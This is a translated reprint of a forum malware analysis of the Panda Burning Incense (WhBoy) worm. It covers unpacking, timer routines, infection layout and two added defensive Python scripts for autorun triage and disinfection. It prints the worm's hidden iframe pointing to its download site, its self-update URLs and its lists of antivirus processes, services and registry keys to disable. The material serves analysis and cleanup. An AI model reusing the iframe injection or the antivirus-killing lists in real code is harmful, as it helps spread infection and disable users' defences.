OD - Panda Burning Incense virus analysis

Reprinted from the Pediy (看雪) forum, original author: Night Blade God

https://bbs.pediy.com/thread-224773.htm

Table of Contents

0x01 Analysis notes and analysis tools

0x02 Virus information

0x03 Virus behaviour

0x04 Unpacking

0x05 Virus initialization analysis

0x06 Timer procedure 1 (timer period: 6000 ms)

0x07 Timer procedure 2 (timer period: 1000 ms)

0x08 Timer procedure 3 (timer period: 120000 ms)

0x09 Timer procedure 4 (timer period: 10000 ms)

0x10 Timer procedure 5 (timer period: 6000 ms)

0x11 Timer procedure 6 (timer period: 10000 ms)

0x12 Timer procedure 7 (timer period: 180000 ms)

0x13 Infection thread analysis

0x14 Detailed infection process analysis

0x15 Running the infected program

0x01 Analysis notes and analysis tools

(1) This virus is best analyzed on a Windows XP system; on 64-bit Windows 7 the program cannot be run from the "C:\WINDOWS\system32\drivers\" directory.

<I was stuck here for a long time. When analyzing a virus, try to determine the environment the virus runs in first; many viruses only run in a particular environment.>

(2) Two APIs are especially important: the timer callback and the thread callback both need to be analyzed.

SetTimer: the virus frequently uses timers to terminate the specified processes periodically.

CreateThread: used to execute other code branches; the code that infects PE files is run on a thread.

(3) IDA's function signature recognition identifies many library functions, which makes the analysis much easier.

Analysis tools

Huorong Sword (火绒剑): very good at detecting sensitive behaviour, and helps to work out what each function does while dynamically debugging in OD.

OD, IDA, 010Editor

BCompare: hex comparison of the program before and after infection.

PE Tools: packer detection and identification of the programming language.

0x02 Virus information

(1) File size: 30,001 bytes

(2) MD5: 512301C535C88255C9A252FDF70B7A03

(3) Packer: FSG v2.0

(4) Language: Delphi

0x03 Virus behaviour

(1) Writes a startup item

(2) Stops services

(3) Infects PE files

(4) Accesses a specified URL to determine whether an update is needed

(5) Drops files and sets their attributes to <hidden | system>

(6) Elevates process privileges

(7) Enumerates window titles, sends a QUIT message to windows with the specified titles, and terminates the specified processes

0x04 Unpacking

(1) Check the packer.

(2) Run to the OEP, then dump the file.

(3) Fix the IAT (locate the end of the import table), then enter the table into ImpREC to repair the imports; the unpacking is then complete.

0x05 Virus initialization analysis

(1) Determine whether the string has been modified

(2) The three most important functions

(3) Determine whether Desktop_.ini exists

(4) Read itself into memory

(5) Convert "C:\WINDOWS\system32\drivers\spo0lsv.exe" to upper case and compare it with its own path

(6) If it is not running as "C:\WINDOWS\system32\drivers\spo0lsv.exe", copy itself to "C:\WINDOWS\system32\drivers\spo0lsv.exe",

run "C:\WINDOWS\system32\drivers\spo0lsv.exe", and terminate itself

0x06 Timer procedure 1 (timer period: 6000 ms)

(1) Determine whether files need to be dropped

(2) Traverse the drives and copy itself to <drive>:\setup.exe

(3) Traverse the drives and create the file <drive>:\autorun.inf

(4) Set the attributes of setup.exe to <system, hidden>

(5) Set the attributes of autorun.inf to <system, hidden>

(6) Write the configuration item
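The drive-root propagation above (a hidden, system-attributed setup.exe next to an autorun.inf) is what a responder checks on every removable drive. The script below is an added example, not code from the original analysis or from the virus: it parses an autorun.inf, lists the executables Explorer could be made to launch, and reports whether they exist in the drive root with the hidden+system attributes. The page does not show the contents of the autorun.inf this sample writes, so the constructed sample in build_sample_drive() uses the standard [AutoRun] keys (open, shellexecute, shell\<verb>\command); that is an assumption.

```python
# Added example: autorun.inf triage for the <drive>:\setup.exe + <drive>:\autorun.inf
# propagation described above. Not the virus's or the author's code.
import configparser
import os
import tempfile
from typing import Dict, List

# Win32 attribute bits (the page says both dropped files get system + hidden).
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4

# Constructed sample: the page does not show the real autorun.inf text, these
# are the standard keys an autorun.inf uses to launch a file (assumption).
SAMPLE_AUTORUN = """[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\\Auto\\command=setup.exe
shell=Auto
"""


def autorun_commands(text: str) -> List[str]:
    """Return every command an autorun.inf could cause Explorer to run (deduplicated)."""
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    cp.optionxform = str.lower          # INF keys are case-insensitive
    cp.read_string(text)
    cmds: List[str] = []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, value in cp.items(section):
            # open= and shellexecute= launch directly; shell\<verb>\command= launches
            # when that verb is chosen (shell=<verb> makes it the default action).
            if key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command")):
                cmd = value.strip().strip('"')
                if cmd and cmd not in cmds:
                    cmds.append(cmd)
    return cmds


def assess_drive_root(root: str) -> Dict[str, object]:
    """Check a drive root for an autorun.inf and the executables it points at."""
    result: Dict[str, object] = {"has_autorun": False, "targets": [], "present": [], "hidden_system": []}
    inf_path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(inf_path):
        return result
    result["has_autorun"] = True
    with open(inf_path, "r", encoding="latin-1", errors="replace") as f:
        targets = autorun_commands(f.read())
    result["targets"] = targets
    for target in targets:
        path = os.path.join(root, target)
        if not os.path.isfile(path):
            continue
        result["present"].append(target)
        # st_file_attributes only exists on Windows; elsewhere the bits read as 0.
        attrs = getattr(os.stat(path), "st_file_attributes", 0)
        want = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
        if attrs & want == want:
            result["hidden_system"].append(target)
    return result


def build_sample_drive() -> str:
    """Create a temp directory that mimics an infected drive root (constructed data)."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "autorun.inf"), "w") as f:
        f.write(SAMPLE_AUTORUN)
    with open(os.path.join(root, "setup.exe"), "wb") as f:
        f.write(b"MZ" + b"\x00" * 64)   # stand-in for the dropped virus copy
    return root


if __name__ == "__main__":
    print(assess_drive_root(build_sample_drive()))
```

On Windows the hidden_system list is what separates this pattern from a benign autorun.inf shipped on an install CD; on other platforms only the presence of the target is reported.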

0x07 Timer procedure 2 (timer period: 1000 ms)

(1) Elevate process privileges

(2) Enumerate window titles, send a QUIT message to the windows with the specified titles, and terminate the specified processes

Window titles searched for:

Firewall, process, VirusScan, NOD32, Internet security, antivirus, Kingsoft, Rising, Jiangmin, Super rabbit, optimization guru, Trojans scavenger, scavenger Trojan, Kaspersky Anti-Virus

Symantec AntiVirus, Duba, esteem procs, 绿鹰PC, 密码防盗, 噬菌体, 木马辅助查找器, System Safety Monitor, Wrapped giftKiller

Winsock Expert, 游戏木马检测大师, 超级巡警, msctls_statusbar32, pjf(ustc), IceSword

Processes to terminate:

Mcshield.exe, VsTskMgr.exe, naPrdMgr.exe, UpdaterUI.ex, TBMon.exe, scan32.exe, Ravmond.exe, CCenterexe, RavTask.exe, Rav.exe,

Ravmon.exe, RavmonD.exe, RavStub.exe, KVXP.kxp, KvMonXP.kxp, KVCenter.kxp, KVSrvXP.exe, KRegEx.exe, UIHost.exe, TrojDiekxp,

FrogAgent.exe, Logo1_.exe, Logo_1.exe, Rundl132.exe, regedit.exe, msconfig.exe, taskmgr.exe

(3) Write the startup item

(4) Set hidden files and folders to not be displayed

0x08 Timer procedure 3 (timer period: 120000 ms)

(1) Updates itself through the address "http://www.ac86.cn/66/up.txt"; the URL is no longer active.

0x09 Timer procedure 4 (timer period: 10000 ms)

(1) Traverse the drives and close the shares

(2) Close the admin share

(3) Kill the current timer

0x10 Timer procedure 5 (timer period: 6000 ms)

(1) Disables the antivirus software's registry startup items by setting their value to 2; the targeted antivirus startup items are listed below:

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkAssociates Error Reporting Service"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse"

(2) Stops service programs in two different ways; the stopped services are listed below:

"sharedaccess", "RsCCenter", "RsRavMon", "KVWSC", "KVSrvXP", "kavsvc", "AVP"

"McAfeeFramework", "McShield", "McTaskManager", "navapsvc", "wscsvc", "KPfwSvc"

"KPfwSvc", "ccProxy", "ccProxy", "ccProxy", "SPBBCSvc", "Symantec Core LC"

"NPFMntor", "NPFMntor", "FireSvc"

0x11 Timer procedure 6 (timer period: 10000 ms)

(1) Fetches the page source of the following websites:

"http://www.tom.com"

"http://www.163.com"

"http://www.sohu.com"

"http://www.yahoo.com"

"http://www.google.com"

0x12 Timer procedure 7 (timer period: 180000 ms)

(1) Updates itself through the address "http://update.whboy.net/worm.txt"; the URL is no longer active.

0x13 Infection thread analysis

(1) The infection thread callback

(2) Get all drive names

(3) Traverse the drives looking for infection targets

(4) File types infected: "EXE", "SRC", "PIF", "COM"

(5) Appends <iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe> to the end of web files with the extensions "html", "asp", "php", "jsp", "aspx".

0x14 Detailed infection process analysis

(1) Read in the target file

(2) Search the program about to be infected for "WhBoy"; if it is found, the file is already infected

(3) Set the target file's attributes to "NORMAL"

(4) Copy itself over the target file

(5) Append the target program after the virus body

(6) The infection marker is "WhBoy" + name of the infected program + ".exe"

0x15 Running the infected program

(1) Structure of the <infected program>

(2) Determine whether it is infected; if so, jump

(3) Create a file named <own process name> + ".exe"

(4) Extract the <original program> from itself and write it to "BeInfected.exe.exe"

(5) Write a batch file to the Temp directory and run it

Batch file contents (the "//" notes of the original are rendered as rem lines so the file runs as written):

    rem Loop deleting the infected file until the deletion succeeds
    :try1
    del "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
    if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe" goto try1
    rem Rename BeInfected.exe.exe to BeInfected.exe and run BeInfected.exe
    ren "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" "BeInfected.exe"
    if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" goto try2
    "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
    :try2
    del %0

Run the generated batch file.

(6) The <infected program> has now been restored to the <original program>, and the <original program> is run.
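Sections 0x13 to 0x15 describe everything needed to undo the infection offline instead of letting the infected host run the virus's own restore routine: the virus body is copied over the victim, the original program is appended after it, and a tail marker "WhBoy" + original name + ".exe" closes the file, while web files get a fixed iframe appended. The script below is an added example, not the virus's or the author's code. It assumes the layout [virus body][original program][marker] with a fixed-size virus body (30,001 bytes for this sample, from 0x02); the real sample may store further tail fields that the page does not show, so VIRUS_BODY_SIZE and the exact tail format are assumptions to confirm against the dump in OD before trusting a restored file. The infected sample it works on is constructed in build_infected_sample(), following 0x14 (4)-(6).

```python
# Added example: offline disinfector for the layout described in 0x13-0x15.
# Layout assumption: [virus body (VIRUS_BODY_SIZE)][original]["WhBoy"+name+".exe"].
import os
import tempfile
from typing import Dict, Optional, Tuple

VIRUS_BODY_SIZE = 30001            # copied virus body size for this sample (0x02); assumption for variants
MARKER_PREFIX = b"WhBoy"
MARKER_SUFFIX = b".exe"
INJECTED_IFRAME = (b'<iframe src=http://www.ac86.cn/66/index.htm '
                   b'width="0" height="0"></iframe>')
PE_EXTS = {".exe", ".src", ".pif", ".com"}            # 0x13 (4)
WEB_EXTS = {".html", ".asp", ".php", ".jsp", ".aspx"}  # 0x13 (5)


def parse_marker(data: bytes) -> Optional[Tuple[int, str]]:
    """Locate the tail marker; return (marker offset, original file name) or None."""
    idx = data.rfind(MARKER_PREFIX)          # last occurrence: the tail, not the body's copy
    if idx < 0:
        return None
    tail = data[idx + len(MARKER_PREFIX):]
    if len(tail) <= len(MARKER_SUFFIX) or not tail.endswith(MARKER_SUFFIX):
        return None
    # Name encoding is the system ANSI code page (assumption); decode leniently.
    name = tail[:-len(MARKER_SUFFIX)].decode("utf-8", errors="replace")
    return idx, name


def restore_original(data: bytes, body_size: int = VIRUS_BODY_SIZE) -> Optional[Tuple[str, bytes]]:
    """Split an infected file into (original name, original bytes); None if not infected."""
    found = parse_marker(data)
    if found is None:
        return None
    idx, name = found
    # "WhBoy" is also a string inside the virus body (0x14 (2) searches for it), so a
    # marker found inside the body means a bare virus copy or a wrong body size.
    if idx < body_size:
        return None
    return name, data[body_size:idx]


def strip_iframe(data: bytes) -> Tuple[bytes, int]:
    """Remove the appended iframe from a web file; return (cleaned bytes, count removed)."""
    count = data.count(INJECTED_IFRAME)
    return (data.replace(INJECTED_IFRAME, b""), count) if count else (data, 0)


def disinfect_file(path: str, body_size: int = VIRUS_BODY_SIZE) -> str:
    """Disinfect one file; the infected PE is left in place as evidence."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as f:
        data = f.read()
    if ext in PE_EXTS:
        restored = restore_original(data, body_size)
        if restored is None:
            return "clean"
        name, original = restored
        with open(path + ".restored", "wb") as f:
            f.write(original)
        return "restored " + name
    if ext in WEB_EXTS:
        cleaned, n = strip_iframe(data)
        if n == 0:
            return "clean"
        with open(path, "wb") as f:
            f.write(cleaned)
        return "stripped %d iframe(s)" % n
    return "skipped"


def disinfect_tree(root: str, body_size: int = VIRUS_BODY_SIZE) -> Dict[str, str]:
    """Walk a directory tree and return {path: result} for every file."""
    results: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            results[p] = disinfect_file(p, body_size)
    return results


def build_infected_sample(original_name: str, original: bytes,
                          body_size: int = VIRUS_BODY_SIZE) -> bytes:
    """Constructed fixture following 0x14 (4)-(6): fake body + original + marker."""
    body = (b"MZ" + MARKER_PREFIX).ljust(body_size, b"\x00")   # fake body that contains "WhBoy"
    return body + original + MARKER_PREFIX + original_name.encode() + MARKER_SUFFIX


def run_demo() -> Dict[str, str]:
    """Disinfect a constructed infected EXE, a clean EXE and an injected HTML page."""
    root = tempfile.mkdtemp()
    original = b"MZ" + bytes(range(256))
    with open(os.path.join(root, "BeInfected.exe"), "wb") as f:
        f.write(build_infected_sample("BeInfected.exe", original))
    with open(os.path.join(root, "clean.exe"), "wb") as f:
        f.write(original)
    with open(os.path.join(root, "index.html"), "wb") as f:
        f.write(b"<html><body>hello</body></html>" + INJECTED_IFRAME)
    results = disinfect_tree(root)
    with open(os.path.join(root, "BeInfected.exe.restored"), "rb") as f:
        assert f.read() == original
    return {os.path.basename(p): r for p, r in results.items()}


if __name__ == "__main__":
    print(run_demo())
```

The restored copy is written beside the infected file rather than over it, so the infected sample stays available for hashing and for checking the tail layout assumption against a real victim before the restored binaries are trusted.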

(1) Please point out any mistakes.

(2) Thanks to the teachers at 15PB for their help and guidance.

Source: www.cnblogs.com/ltyandy/p/11332090.html